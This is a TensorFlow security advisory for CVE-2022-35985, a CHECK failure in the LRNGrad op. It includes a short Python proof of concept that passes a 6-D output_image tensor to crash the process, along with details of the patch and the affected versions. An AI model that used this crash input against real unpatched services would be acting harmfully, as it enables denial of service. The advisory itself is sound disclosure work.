## TFSA-2022-116: `CHECK` fail in `LRNGrad`

### CVE Number
CVE-2022-35985

### Impact
If `LRNGrad` is given an `output_image` input tensor that is not 4-D, it results in a `CHECK` fail that can be used to trigger a denial of service attack.
```python
import tensorflow as tf
depth_radius = 1
bias = 1.59018219
alpha = 0.117728651
beta = 0.404427052
input_grads = tf.random.uniform(shape=[4, 4, 4, 4], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2033)
input_image = tf.random.uniform(shape=[4, 4, 4, 4], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2033)
output_image = tf.random.uniform(shape=[4, 4, 4, 4, 4, 4], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2033)
tf.raw_ops.LRNGrad(input_grads=input_grads, input_image=input_image, output_image=output_image, depth_radius=depth_radius, bias=bias, alpha=alpha, beta=beta)
```

### Patches
We have patched the issue in GitHub commit [bd90b3efab4ec958b228cd7cfe9125be1c0cf255](https://github.com/tensorflow/tensorflow/commit/bd90b3efab4ec958b228cd7cfe9125be1c0cf255).

The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.


### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.


### Attribution
This vulnerability has been reported by Di Jin, Secure Systems Labs, Brown University
